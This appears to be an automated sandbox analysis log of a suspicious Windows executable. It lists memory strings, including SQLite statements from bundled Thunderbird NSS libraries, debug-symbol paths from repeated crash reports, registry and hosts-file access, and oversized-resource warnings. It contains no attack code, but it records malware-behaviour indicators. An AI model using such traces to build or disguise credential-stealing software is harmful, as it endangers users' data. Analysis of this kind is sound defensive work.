Source: cYKFZFK0Rg.exe, 00000001.00000000.310964410.0000000000400000.00000040.00020000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: cYKFZFK0Rg.exe, 00000001.00000000.310964410.0000000000400000.00000040.00020000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: SELECT ALL id FROM %s;
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5468
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: cYKFZFK0Rg.exe Static file information: File size 1648640 > 1048576
Source: cYKFZFK0Rg.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x121a00
Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: CLBCatQ.pdb+ source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdbk source: WerFault.exe, 00000005.00000003.273441706.0000000004B91000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304024163.0000000004B01000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333642964.0000000002DA1000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361392768.0000000004C01000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403910058.00000000055C5000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474404687.0000000005044000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515363571.0000000005464000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdbjX source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: crypt32.pdbN source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: dwmapi.pdb8 source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 0000001B.00000003.403584503.00000000055D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474348185.0000000005052000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515274442.0000000005472000.00000004.00000001.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: mozglue[1].dll.1.dr
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000005.00000003.273441706.0000000004B91000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304024163.0000000004B01000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333642964.0000000002DA1000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361392768.0000000004C01000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403910058.00000000055C5000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474404687.0000000005044000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515363571.0000000005464000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000005.00000003.273441706.0000000004B91000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304151461.0000000004B05000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333724286.0000000002DA5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361392768.0000000004C01000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403910058.00000000055C5000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474484279.0000000005047000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515425429.0000000005467000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000005.00000003.268737897.00000000028E0000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.390319982.000000000324D000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.500274963.0000000002F6D000.00000004.00000001.sdmp
Source: Binary string: dwmapi.pdb' source: WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp
Source: Binary string: dpapi.pdbfQ source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp
Source: Binary string: winnsi.pdb source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: version.pdb`X source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000005.00000003.273441706.0000000004B91000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304151461.0000000004B05000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333724286.0000000002DA5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361392768.0000000004C01000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403910058.00000000055C5000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474484279.0000000005047000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515425429.0000000005467000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdb. source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdb- source: WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp
Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: vcruntime140.i386.pdbGCTL source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, vcruntime140[1].dll.1.dr
Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: urlmon.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: schannel.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc.pdbA source: WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wintrust.pdbc source: WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.462570750.00000000029F9000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: ws2_32.pdbr source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: OneCoreUAPCommonProxyStub.pdbW source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp
Source: Binary string: gdiplus.pdb( source: WerFault.exe, 00000020.00000003.461640685.00000000044C6000.00000004.00000001.sdmp
Source: Binary string: OneCoreUAPCommonProxyStub.pdbR source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.1.dr
Source: Binary string: bcrypt.pdb@ source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: rasadhlp.pdbx source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb! source: WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp
Source: Binary string: urlmon.pdb source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, softokn3.dll.1.dr
Source: Binary string: propsys.pdbU source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: version.pdbF source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: aCnjrFnCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000020.00000002.482493082.0000000002632000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdbM source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdbx source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp
Source: Binary string: wininet.pdb~ source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: ole32.pdbW source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp
Source: Binary string: psapi.pdb&XCG source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: gdiplus.pdba source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: wininet.pdb\XEG source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: comctl32.pdbd source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: nsi.pdb source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403584503.00000000055D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474348185.0000000005052000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515274442.0000000005472000.00000004.00000001.sdmp
Source: Binary string: gdiplus.pdbPXqG source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: shell32.pdbY source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: gpapi.pdb source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: version.pdbR source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdbBXgG source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: iertutil.pdbO source: WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000005.00000003.273441706.0000000004B91000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304151461.0000000004B05000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333724286.0000000002DA5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361392768.0000000004C01000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403910058.00000000055C5000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474484279.0000000005047000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515425429.0000000005467000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb4 source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdbo source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb} source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: iertutil.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: dnsapi.pdb"Q source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp
Source: Binary string: ole32.pdbL source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: shell32.pdbJ source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: winhttp.pdbt source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: iertutil.pdb? source: WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.1.dr
Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000005.00000003.273468571.0000000004B90000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304142084.0000000004B00000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333711850.0000000002DA0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361498528.0000000004C00000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403983797.00000000055C0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474779031.0000000005040000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515804409.0000000005460000.00000004.00000040.sdmp
Source: Binary string: sechost.pdbk source: WerFault.exe, 00000005.00000003.273441706.0000000004B91000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304024163.0000000004B01000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333642964.0000000002DA1000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361392768.0000000004C01000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403910058.00000000055C5000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474404687.0000000005044000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515363571.0000000005464000.00000004.00000040.sdmp
Source: Binary string: schannel.pdbtQ source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: comctl32v582.pdbT source: WerFault.exe, 00000005.00000003.273468571.0000000004B90000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000005.00000003.273468571.0000000004B90000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304142084.0000000004B00000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333711850.0000000002DA0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361498528.0000000004C00000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403983797.00000000055C0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474779031.0000000005040000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515804409.0000000005460000.00000004.00000040.sdmp
